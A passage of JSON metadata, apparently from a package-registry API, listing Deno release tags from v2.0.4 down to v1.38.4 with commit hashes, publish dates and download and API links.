.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno